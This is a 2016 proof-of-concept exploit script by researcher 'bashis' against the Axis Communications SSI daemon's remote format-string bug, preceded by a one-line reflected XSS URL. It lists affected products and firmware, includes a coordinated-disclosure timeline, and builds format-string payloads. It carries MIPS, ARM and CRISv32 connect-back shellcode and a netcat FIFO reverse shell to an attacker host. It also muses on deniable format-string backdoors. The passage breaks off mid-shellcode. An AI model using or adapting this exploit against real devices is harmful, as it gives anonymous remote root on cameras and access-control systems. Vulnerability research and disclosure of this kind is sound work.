http://www.example.com/admin/showReport.shtml?content=serverreport.cgi&pageTitle=%3C%2Ftitle%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3B%3C%2Fscript%3E%3Ctitle%3E
            
#!/usr/bin/env python2.7
# 
# [SOF]
#
# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon
# Research and development by bashis <mcw noemail eu> 2016
#
# This format string vulnerability has following characteristic:
# - Heap Based (Exploiting string located on the heap)
# - Blind Attack (No output the remote attacker)(*)
# - Remotely exploitable (as anonymous, no credentials needed)
#
# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic.
#
# This exploit has following characteristic:
# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]
# - Modifying LHOST/LPORT in shellcode on the fly
# - Manual exploiting of remote targets
# - Simple HTTPS support
# - Basic Authorization support (not needed for this exploit)
# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode
# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)
# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root
# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)
# - Multiple FMS exploit techniques
#   - "One-Write-Where-And-What" for MIPS and CRISv32
#     Using "Old Style" POP's
#     Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call
#     Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.
#   - "Two-Write-Where-And-What" for ARM
#     1) "Old Style": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address
#     2) "New Style": ARM Arch's have both "Old Style" (>5.50.x) POPs and "New Style" (<5.40.x) direct parameter access for POP/Write
#     [Big difference in possibilities between "Old Style" and "New Style", pretty interesting actually]
# - Another way to POP with "Old Style", to be able to POP with as little as 1 byte (one byte with %1c instead of eight with %8x)
# - Exploit is quite well documented
#
# Anyhow,
# Everything started from this simple remote request:
#
# ---
# $ echo -en "GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\n\n" | netcat 192.168.0.90 80
# HTTP/1.1 500 Server Error
# Content-Type: text/html; charset=ISO-8859-1
#
# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>
# <BODY><H1>500 Server Error</H1>
# The server encountered an internal error and could not complete your request.
# </BODY></HTML>
# ---
#
# Which gave this output in /var/log/messages on the remote device:
#
# ---
# <CRITICAL> Jan  1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10
# <CRITICAL> Jan  1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.
# ---
#
# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products
#
# ---
# $ netcat -vvlp 31337
# listening on [any] 31337 ...
# 192.168.0.90: inverse host lookup failed: Unknown host
# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)
# pwd
# /usr/html
# ---
#
# Some technical notes:
#
# 1.  Direct addressing with %<argument>$%n is "delayed", and comes into force only after disconnect.
#     The old method with POPs comes into force instantly
#
# 2.  Argument "0" will be assigned (after using the old POP method and %n WRITE) the next address on the stack after the POPs
#     - Would be interesting to investigate why.
#
# 3.  Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26
#     Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff
#
# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff
#     Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f
#
# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:
#     Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)
#
# 4.  Everything is randomized, except heap.
#
# 5.  My initial attempts to use ROP's was not good, as I didn't want to create
#     one unique FMS key by testing each single firmware version, and using ROP with FMS
#     on heap seems pretty complicated as there is one jump available, maximum two.
#
# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.
#    
# 6.  Encoded and Decoded shellcode located in .bss section.
# 6.1 FMS executed on heap
#
# 7.  Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM
# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,
#     so execute shellcode on heap/stack may be impossible.
# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,
#     and re-compile of the image.
# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.
#
# 8.  This exploit is pretty well documented, more details can be extracted by reading
#     the code and comments.
#
# MIPS ssid maps
# 00400000-0040d000 r-xp 00000000 00:01 2272       /bin/ssid
# 0041d000-0041e000 rw-p 0000d000 00:01 2272       /bin/ssid
# 0041e000-00445000 rwxp 00000000 00:00 0          [heap]
#
# ARM ssid maps
# 00008000-00014000 r-xp 00000000 00:01 2055        /bin/ssid
# 0001c000-0001d000 rw-p 0000c000 00:01 2055        /bin/ssid
# 0001d000-00044000 rw-p 00000000 00:00 0           [heap]
#
# Crisv32 ssid maps
# 00080000-0008c000 r-xp 00000000 1f:03 115        /bin/ssid
# 0008c000-0008e000 rw-p 0000a000 1f:03 115        /bin/ssid
# 0008e000-000b6000 rwxp 0008e000 00:00 0          [heap]
#
# General notes:
#
# When the vulnerable daemon process is exploited, and after popping a root connect-back shell,
# the main process is usually restarted by respawnd once the shell has spawned and taken over the parent process.
# When the main process is fully alive again, I can enjoy the shell, and everybody else can
# enjoy the camera - that should make all of us happy ;)
# During exploitation the logs say almost nothing, only that the main process restarted.
# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)
#
# '&http_user=' is the vulnerable tag, and the FMS will be executed when ssid tries to do vsyslog()
# after it cannot verify the user; free() is the closest function to be called after
# vsyslog(), needed and perfect to use for jumping.
# Nothing is shown to the remote user; any output of the FMS is _only_ shown in the log/console.
# So we are pretty blind, but due to the fixed FMS keys that doesn't matter for us - it's predictable by statistics.
#
# Quite surprised to see so many different devices and under one major release version,
# that's covered by one "FMS key". The "FMS key" are valid for all minor versions under the major version.
#
# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor,  
# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password.    
#
# - No hardcoded login/password that could easily be found in firmware/software files.    
# - Extremely hard to find without local access (and find out what to trigger for opening the door)
# - Nobody can actually prove it is a sophisticated door for sure. "It's just another bug.. sorry! - here is the fixed version."
#   (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)
#
# Note:
# I don't say that Axis Communication has made this hidden format string by this purpose.
# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon,    
# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().
#
# Vulnerable and exploitable products
#
# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,
# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,
# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,
# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,
# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,
# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,
# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,
# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,
# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,
# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,
# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,
# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,
# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,
# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,
# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,
# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more
#
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
#
# Firmware versions vulnerable to the SSI FMS exploit
#
# ('V.Vx' == The FMS key used in this exploit)
#
# Firmware	Introduced	CRISv32		MIPS		ARM (no exec heap from >5.20.x)
# 5.00.x	2008		-		-		no
# 5.01.x	2008		no		-		no
# 5.02.x	2008		no		-		-
# 5.05.x	2009		no		-		-
# 5.06.x	2009		no		-		-
# 5.07.x	2009		no		-		no
# 5.08.x	2010		no		-		-
# 5.09.x	2010		no		-		-
# 5.10.x	2009		no		-		-
# 5.11.x	2010		no		-		-
# 5.12.x	2010		no		-		-
# 5.15.x	2010		no		-		-
# 5.16.x	2010		no		-		-
# 5.20.x	2010-2011	5.2x		-		5.2x
# 5.21.x	2011		5.2x		-		5.2x
# 5.22.x	2011		5.2x		-		-
# 5.25.x	2011		5.2x		-		-
# 5.40.x	2011		5.4x		5.4x		5.4x
# 5.41.x	2012		5.4x		-		-
# 5.50.x	2013		5.5x		5.5x		5.4x
# 5.51.x	2013		-		5.4x		-
# 5.55.x	2013		-		5.5x		5.5x
# 5.60.x	2014		-		5.6x		5.6x
# 5.65.x	2014-2015	-		5.6x		-
# 5.70.x	2015		-		5.7x		-
# 5.75.x	2015		-		5.7x		5.7x
# 5.80.x	2015		-		5.8x		5.8x
# 5.81.x	2015		-		5.8x		-
# 5.85.x	2015		-		5.8x		5.8x
# 5.90.x	2015		-		5.9x		-
# 5.95.x	2016		-		5.9x		5.8x
# 6.10.x	2016		-		6.1x		-
# 6.15.x	2016		-		-		6.1x
# 6.20.x	2016		-		6.2x		-
#
# Vendor URL's of still supported and affected products
#
# http://www.axis.com/global/en/products/access-control
# http://www.axis.com/global/en/products/video-encoders
# http://www.axis.com/global/en/products/network-cameras
# http://www.axis.com/global/en/products/audio
#
# Axis Product Security
#
# product-security@axis.com
# http://www.axis.com/global/en/support/product-security
# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt
# http://www.axis.com/global/en/support/faq/FAQ116268
#
# Timetable
#
# - Research and Development: 06/01/2016 - 01/06/2016
# - Sent vulnerability details to vendor: 05/06/2016
# - Vendor response received: 06/06/2016
# - Vendor ACK of findings received: 07/06/2016
# - Vendor sent verification image: 13/06/2016
# - Confirmed that the exploit does not work after the vendor's correction: 13/06/2016
# - Vendor informed about their service release(s): 29/06/2016
# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016
# - Full Disclosure: 18/07/2016
#
# Quote of the day: Never say "whoops! :o", always say "Ah, still interesting! :>"
#
# Have a nice day
# /bashis
#
#####################################################################################

import sys
import string
import socket
import time
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import re


class do_FMS:
	"""Incrementally assemble a format-string ("FMS") payload.

	Two addressing styles are supported and may be appended in any order:

	* 'Old style' - a run of POP tokens walks printf's vararg cursor up the
	  stack one slot at a time until it sits on the slot holding the target
	  pointer, then a %n-family WRITE stores the byte counter through it.
	* 'New style' - direct parameter access (``%<idx>$n``) names the slot
	  explicitly, so no POPs are needed.

	Every %n variant writes printf's count of bytes emitted so far; AddADDR()
	inflates that counter with a wide %u so it holds the wanted value before
	the write.  targetIP and verbose are kept on the instance for the caller;
	nothing in this class reads them while building.
	"""

	# An earlier variant used "%8x" (8 output bytes per slot consumed); the
	# 1-byte form keeps the payload short and the counter arithmetic simple.
	POP = "%1c"		# Old style POP: consumes one vararg slot, emits exactly 1 byte
	WRITElln = "%lln"	# Write 8 bytes (counter stored as long long)
	WRITEn = "%n"		# Write 4 bytes
	WRITEhn = "%hn"		# Write 2 bytes
	WRITEhhn = "%hhn"	# Write 1 byte

	# Direct-parameter conversion suffixes, keyed by write width in bytes.
	_DIRECT = {8: 'lln', 4: 'n', 2: 'hn', 1: 'hhn'}

	def __init__(self, targetIP, verbose):
		self.targetIP = targetIP
		self.verbose = verbose
		self.fmscode = ""	# payload accumulated so far

	def Add(self, data):
		"""Append raw text to the payload (every other Add* method ends up here)."""
		self.fmscode = self.fmscode + data

	def _direct(self, index, width):
		"""Append a 'new style' *width*-byte write through vararg slot *index*."""
		self.Add('%' + str(index) + '$' + self._DIRECT[width])

	def AddDirectParameterLLN(self, ADDR):
		"""'New style' 8-byte write: %<ADDR>$lln (ADDR is a parameter index)."""
		self._direct(ADDR, 8)

	def AddDirectParameterN(self, ADDR):
		"""'New style' 4-byte write: %<ADDR>$n (ADDR is a parameter index)."""
		self._direct(ADDR, 4)

	def AddDirectParameterHN(self, ADDR):
		"""'New style' 2-byte write: %<ADDR>$hn (ADDR is a parameter index)."""
		self._direct(ADDR, 2)

	def AddDirectParameterHHN(self, ADDR):
		"""'New style' 1-byte write: %<ADDR>$hhn (ADDR is a parameter index)."""
		self._direct(ADDR, 1)

	def AddADDR(self, ADDR):
		"""Append %<ADDR>u.

		The next vararg is printed padded to at least ADDR characters, so
		printf's byte counter advances by ADDR (more only if the value needs
		more digits than that) - this is what sets the value a following
		%n-style write stores.
		"""
		self.Add('%' + str(ADDR) + 'u')

	def _repeat(self, token, count):
		"""Append *token* *count* times; a count of 0 (or less) appends nothing."""
		self.Add(token * count)

	def AddPOP(self, size):
		"""'Old style': consume *size* vararg slots."""
		self._repeat(self.POP, size)

	# Normally a single WRITE is sent; several in a row is a quick way to
	# probe for the presence of any format-string bug at all.
	def AddWRITElln(self, size):
		"""'Old style' 8-byte write, repeated *size* times."""
		self._repeat(self.WRITElln, size)

	def AddWRITEn(self, size):
		"""'Old style' 4-byte write, repeated *size* times."""
		self._repeat(self.WRITEn, size)

	def AddWRITEhn(self, size):
		"""'Old style' 2-byte write, repeated *size* times."""
		self._repeat(self.WRITEhn, size)

	def AddWRITEhhn(self, size):
		"""'Old style' 1-byte write, repeated *size* times."""
		self._repeat(self.WRITEhhn, size)

	def FMSbuild(self):
		"""Return the payload assembled so far."""
		return self.fmscode

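class HTTPconnect:
	"""HTTP transport for the exploit: one raw-socket GET and one urllib2 GET.

	host      - "address:port" of the target (RAW() splits on ':' itself,
	            Send() embeds it verbatim in the URL)
	proto     - 'http' or 'https' (used by Send() only)
	verbose   - echo target, URI/URL and auth user before sending
	creds     - "user:password" for HTTP Basic auth, or False for none
	noexploit - dry run: print what would be sent but transmit nothing
	"""

	def __init__(self, host, proto, verbose, creds, noexploit):
		self.host = host
		self.proto = proto
		self.verbose = verbose
		self.credentials = creds
		self.noexploit = noexploit

	# The netcat connect-back shell needs a raw HTTP connection because the
	# payload contains characters ('\t', '$', '`', ...) that urllib2 would
	# reject or percent-encode.
	def RAW(self, uri):
		"""Send `GET <uri> HTTP/1.0` over a plain TCP socket.

		Returns the first chunk (up to 4096 bytes) of whatever comes back, or
		"Not sending any data" on a dry run.  The reply is not interpreted;
		the caller only cares that the request was delivered.  socket.error
		from connect()/sendall() propagates; the socket is always closed.
		"""
		# Connect/recv timeout in seconds.  setdefaulttimeout() is
		# process-global and also governs every socket urllib2 opens later;
		# kept because the rest of the tool may rely on it.
		timeout = 5
		socket.setdefaulttimeout(timeout)

		tmp = self.host.split(':')
		HOST = tmp[0]
		PORT = int(tmp[1])
		if self.verbose:
			print("[Verbose] Sending to: %s" % HOST)
			print("[Verbose] Port: %d" % PORT)
			print("[Verbose] URI: %s" % uri)

		if self.noexploit:
			# Dry run: mirror Send() so --noexploit never fires the netcat
			# payload either.
			print("[<] 204 Not Sending!")
			return "Not sending any data"

		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
		s.settimeout(timeout)
		try:
			s.connect((HOST, PORT))
			# sendall(): send() may transmit only part of the buffer and the
			# exploit string must arrive whole.
			s.sendall("GET %s HTTP/1.0\r\n\r\n" % uri)
			html = s.recv(4096)  # we really do not care what comes back
			try:
				# SHUT_RDWR (2) replaces the literal 3, which is not a defined
				# 'how' value (SHUT_RD=0, SHUT_WR=1, SHUT_RDWR=2) and which
				# Linux rejects with EINVAL.
				s.shutdown(socket.SHUT_RDWR)
			except socket.error:
				pass  # peer may already have closed; nothing left to tear down
		finally:
			s.close()  # never leak the descriptor, even when connect() fails
		return html

	def Send(self, uri):
		"""Send `GET <proto>://<host><uri>` through urllib2 and return the body.

		Honours self.credentials (HTTP Basic) and self.noexploit.  Any
		urllib2.HTTPError/URLError raised by the request propagates to the
		caller; malformed credentials exit the process with status 1.
		"""
		# The SSI daemon looks for this User-Agent and opens an extra FD (5)
		# when it sees it.  That does not matter for the exploit itself; kept
		# for future reference.
		headers = {
			'User-Agent' : 'MSIE',
		}

		# Connect-timeout in seconds (process-global, see RAW()).
		timeout = 5
		socket.setdefaulttimeout(timeout)

		url = '%s://%s%s' % (self.proto, self.host, uri)

		if self.verbose:
			print("[Verbose] Sending: %s" % url)

		if self.proto == 'https':
			# Certificate verification is switched off, presumably because the
			# targets present self-signed certificates.  NOTE(review): this
			# replaces the default context for the whole process, so every
			# later HTTPS request made by this tool is open to interception -
			# acceptable for a PoC against a lab device, not for anything else.
			if hasattr(ssl, '_create_unverified_context'):
				print("[i] Creating SSL Default Context")
				ssl._create_default_https_context = ssl._create_unverified_context

		if self.credentials:
			# Split on the first ':' only so a password containing ':' survives.
			Basic_Auth = self.credentials.split(':', 1)
			if len(Basic_Auth) != 2:
				print("[!] Basic Auth Error: credentials must be user:password")
				sys.exit(1)
			if self.verbose:
				# The password is deliberately not echoed to the console.
				print("[Verbose] User: %s" % Basic_Auth[0])
			try:
				pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
				pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
				auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
				opener = urllib2.build_opener(auth_handler)
				# Global: every later urlopen() in the process reuses it.
				urllib2.install_opener(opener)
			except Exception as e:
				print("[!] Basic Auth Error: %s" % e)
				sys.exit(1)

		html = ""
		# The original only honoured noexploit when verbose was off, so
		# "--noexploit --verbose" actually fired the request.  A dry-run flag
		# must win regardless of verbosity.
		if self.noexploit:
			print("[<] 204 Not Sending!")
			html = "Not sending any data"
		else:
			req = urllib2.Request(url, None, headers)
			rsp = urllib2.urlopen(req)
			if rsp:
				print("[<] %s OK" % rsp.code)
				html = rsp.read()
		return html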


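class shellcode_db:
	"""Connect-back payload store, one entry per target type.

	sc(target) returns the payload for 'MIPSel', 'ARMel', 'CRISv32' or the
	netcat shell ('NCSH1' / 'NCSH2', both the same string) and exits the
	process with status 1 for anything else.

	The binary payloads are URL-encoded (%xx) so that, as the header notes
	say, no byte is off-limits in Apache's or Boa's URI handling.  The listen
	address and port are left as placeholders - 'PP1PP0' and 'IP1IP2IP3IP4'
	in the binary payloads, 'LHOST' / 'LPORT' in the netcat one - which the
	caller substitutes before use.  targetIP is stored but not consulted here.
	"""

	def __init__(self,targetIP,verbose):
		self.targetIP = targetIP
		self.verbose = verbose

	def sc(self,target):
		"""Return the payload string for *target* (see the class docstring)."""
		self.target = target


# Connect back shellcode
#
# CRISv32: Written by myself, no shellcode available out on "The Internet"
# NCSH: My PoC of netcat FIFO / PIPE reverse shell, w/o '-e' option and with $IFS as separators
# MIPSel: Written by Jacob Holcomb (url encoded by me)
# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php
#
# Each payload below is a single string built from adjacent literals;
# ''.join() replaces string.join() (gone in Python 3) with the same result.
#
		# Slightly modified syscall's
		MIPSel = ''.join([
		#close stdin
		"%ff%ff%04%28" #slti	a0,zero,-1
		"%a6%0f%02%24" #li	v0,4006
		"%4c%f7%f7%03" #syscall	0xdfdfd
		#close stdout
		"%11%11%04%28" #slti	a0,zero,4369
		"%a6%0f%02%24" #li	v0,4006
		"%4c%f7%f7%03" #syscall 0xdfdfd
		#close stderr
		"%fd%ff%0c%24" #li	t4,-3
		"%27%20%80%01" #nor	a0,t4,zero
		"%a6%0f%02%24" #li	v0,4006
		"%4c%f7%f7%03" #syscall 0xdfdfd
		# socket AF_INET (2)
		"%fd%ff%0c%24" #li	t4,-3
		"%27%20%80%01" #nor	a0,t4,zero
		"%27%28%80%01" #nor	a1,t4,zero
		"%ff%ff%06%28" #slti	a2,zero,-1
		"%57%10%02%24" #li	v0,4183
		"%4c%f7%f7%03" #syscall 0xdfdfd
		#
		"%ff%ff%44%30" # andi $a0, $v0, 0xFFFF
		#
		# dup2 stdout
		"%c9%0f%02%24" #li	v0,4041
		"%4c%f7%f7%03" #syscall 0xdfdfd
		#
		# dup2 stderr
		"%c9%0f%02%24" #li	v0,4041
		"%4c%f7%f7%03" #syscall 0xdfdfd
		#
		# Port
		"PP1PP0%05%3c"
		"%01%ff%a5%34"
		#
		"%01%01%a5%20" #addi	a1,a1,257
		"%f8%ff%a5%af" #sw	a1,-8(sp)
		#
		# IP
		"IP3IP4%05%3c"
		"IP1IP2%a5%34"
		#
		"%fc%ff%a5%af" #sw	a1,-4(sp)
		"%f8%ff%a5%23" #addi	a1,sp,-8
		"%ef%ff%0c%24" #li	t4,-17
		"%27%30%80%01" #nor	a2,t4,zero
		"%4a%10%02%24" #li	v0,4170
		"%4c%f7%f7%03" #syscall 0xdfdfd
		#
		"%62%69%08%3c" #lui	t0,0x6962
		"%2f%2f%08%35" #ori	t0,t0,0x2f2f
		"%ec%ff%a8%af" #sw	t0,-20(sp)
		"%73%68%08%3c" #lui	t0,0x6873
		"%6e%2f%08%35" #ori	t0,t0,0x2f6e
		"%f0%ff%a8%af" #sw	t0,-16(sp
		"%ff%ff%07%28" #slti	a3,zero,-1
		"%f4%ff%a7%af" #sw	a3,-12(sp)
		"%fc%ff%a7%af" #sw	a3,-4(sp
		"%ec%ff%a4%23" #addi	a0,sp,-20
		"%ec%ff%a8%23" #addi	t0,sp,-20
		"%f8%ff%a8%af" #sw	t0,-8(sp)
		"%f8%ff%a5%23" #addi	a1,sp,-8
		"%ec%ff%bd%27" #addiu	sp,sp,-20
		"%ff%ff%06%28" #slti	a2,zero,-1
		"%ab%0f%02%24" #li	v0,4011 (execve)
		"%4c%f7%f7%03" #syscall 0xdfdfd
		])

		# Working netcat shell
		# - $PATH will locate 'mkfifo', 'nc' and 'rm'
		# - LHOST / LPORT will be changed on the fly later in the code
		# - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting
		# - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]
		# $ echo -n "$IFS" | hexdump -C
		# 00000000  20 09 0a
		# - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c]
		#
		# '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator
		#
		# Working with Apache and Boa
#		NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1"
		NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1"

		ARMel = ''.join([
		# original: http://shell-storm.org/shellcode/files/shellcode-754.php
		# 32-bit instructions, enter thumb mode
		"%01%10%8f%e2"	# add r1, pc, #1
		"%11%ff%2f%e1"	# bx r1

		# 16-bit thumb instructions follow
		#
		# socket(2, 1, 0)
		"%02%20"	#mov     r0, #2
		"%01%21"	#mov     r1, #1
		"%92%1a"	#sub     r2, r2, r2
		"%0f%02"	#lsl     r7, r1, #8
		"%19%37"	#add     r7, r7, #25
		"%01%df"	#svc     1
		#
		# connect(r0, &addr, 16)
		"%06%1c"	#mov     r6, r0
		"%08%a1"	#add     r1, pc, #32
		"%10%22"	#mov     r2, #16
		"%02%37"	#add     r7, #2
		"%01%df"	#svc     1
		#
		# dup2(r0, 0/1/2)
		"%3f%27"	#mov     r7, #63
		"%02%21"	#mov     r1, #2
		#
		#lb:
		"%30%1c"	#mov     r0, r6
		"%01%df"	#svc     1
		"%01%39"	#sub     r1, #1
		"%fb%d5"	#bpl     lb
		#
		# execve("/bin/sh", ["/bin/sh", 0], 0)
		"%05%a0"	#add     r0, pc, #20
		"%92%1a"	#sub     r2, r2, r2
		"%05%b4"	#push    {r0, r2}
		"%69%46"	#mov     r1, sp
		"%0b%27"	#mov     r7, #11
		"%01%df"	#svc     1
		#
		"%c0%46"	# .align 2 (NOP)
		"%02%00"	# .short 0x2		(struct sockaddr)
		"PP1PP0"	# .short 0x3412		(port: 0x1234)
		"IP1IP2IP3IP4"	#.byte 192,168,57,1	(ip: 192.168.57.1)
		# .ascii "/bin/sh\0\0"
		"%2f%62%69%6e"	# /bin
		"%2f%73%68%00%00"	# /sh\x00\x00
		"%00%00%00%00"
		"%c0%46"
		])


		# Connect-back shell for Axis CRISv32
		# Written by mcw noemail eu 2016
		#
		CRISv32 = ''.join([
		#close(0)
		"%7a%86"		# clear.d r10 
		"%5f%9c%06%00"		# movu.w 0x6,r9
		"%3d%e9"		# break 13
		#close(1)
		"%41%a2"		# moveq 1,r10
		"%5f%9c%06%00"		# movu.w 0x6,r9
		"%3d%e9"		# break 13
		#close(2)
		"%42%a2"		# moveq 2,r10
		"%5f%9c%06%00"		# movu.w 0x6,r9
		"%3d%e9"		# break 13
		#
		"%10%e1"		# addoq 16,sp,acr
		"%42%92"		# moveq 2,r9
		"%df%9b"		# move.w r9,[acr]
		"%10%e1"		# addoq 16,sp,acr
		"%02%f2"		# addq 2,acr
		#PORT
		"%5f%9ePP1PP0"		# move.w 0xPP1PP0,r9 #
		"%df%9b"		# move.w r9,[acr]
		"%10%e1"		# addoq 16,sp,acr
		"%6f%96"		# move.d acr,r9
		"%04%92"		# addq 4,r9
		#IP
		"%6f%feIP1IP2IP3IP4"	# move.d IP4IP3IP2IP1,acr
		"%e9%fb"		# move.d acr,[r9]
		#
		#socket()
		"%42%a2"		# moveq 2,r10
		"%41%b2"		# moveq 1,r11
		"%7c%86"		# clear.d r12
		"%6e%96"		# move.d $sp,$r9
		"%e9%af"		# move.d $r10,[$r9+]
		"%e9%bf"		# move.d $r11,[$r9+]
		"%e9%cf"		# move.d $r12,[$r9+]
		"%41%a2"		# moveq 1,$r10
		"%6e%b6"		# move.d $sp,$r11
		"%5f%9c%66%00"		# movu.w 0x66,$r9
		"%3d%e9"		# break 13
		#
		"%6a%96"		# move.d $r10,$r9
		"%0c%e1"		# addoq 12,$sp,$acr
		"%ef%9b"		# move.d $r9,[$acr]
		"%0c%e1"		# addoq 12,$sp,$acr
		"%6e%96"		# move.d $sp,$r9
		"%10%92"		# addq 16,$r9
		"%6f%aa"		# move.d [$acr],$r10
		"%69%b6"		# move.d $r9,$r11
		"%50%c2"		# moveq 16,$r12
		#
		# connect()
		"%6e%96"		# move.d $sp,$r9
		"%e9%af"		# move.d $r10,[$r9+]
		"%e9%bf"		# move.d $r11,[$r9+]
		"%e9%cf"		# move.d $r12,[$r9+]
		"%43%a2"		# moveq 3,$r10
		"%6e%b6"		# move.d $sp,$r11
		"%5f%9c%66%00"		# movu.w 0x66,$r9 
		"%3d%e9"		# break 13
		# dup(0) already in socket
		#dup(1)
		"%6f%aa"		# move.d [$acr],$r10
		"%41%b2"		# moveq 1,$r11
		"%5f%9c%3f%00"		# movu.w 0x3f,$r9
		"%3d%e9"		# break 13
		#
		#dup(2)
		"%6f%aa"		# move.d [$acr],$r10
		"%42%b2"		# moveq 2,$r11
		"%5f%9c%3f%00"		# movu.w 0x3f,$r9
		"%3d%e9"		# break 13
		#
		#execve("/bin/sh",NULL,NULL)
		"%90%e2"		# subq 16,$sp
		"%6e%96"		# move.d $sp,$r9
		"%6e%a6"		# move.d $sp,$10
		"%6f%0e%2f%2f%62%69"	# move.d 69622f2f,$r0
		"%e9%0b"		# move.d $r0,[$r9]
		"%04%92"		# addq 4,$r9
		"%6f%0e%6e%2f%73%68"	# move.d 68732f6e,$r0
		"%e9%0b"		# move.d $r0,[$r9]
		"%04%92"		# addq 4,$r9
		"%79%8a"		# clear.d [$r9]
		"%04%92"		# addq 4,$r9
		"%79%8a"		# clear.d [$r9]
		"%04%92"		# addq 4,$r9
		"%e9%ab"		# move.d $r10,[$r9]
		"%04%92"		# addq 4,$r9
		"%79%8a"		# clear.d [$r9]
		"%10%e2"		# addq 16,$sp
		"%6e%f6"		# move.d $sp,$acr
		"%6e%96"		# move.d $sp,$r9
		"%6e%b6"		# move.d $sp,$r11
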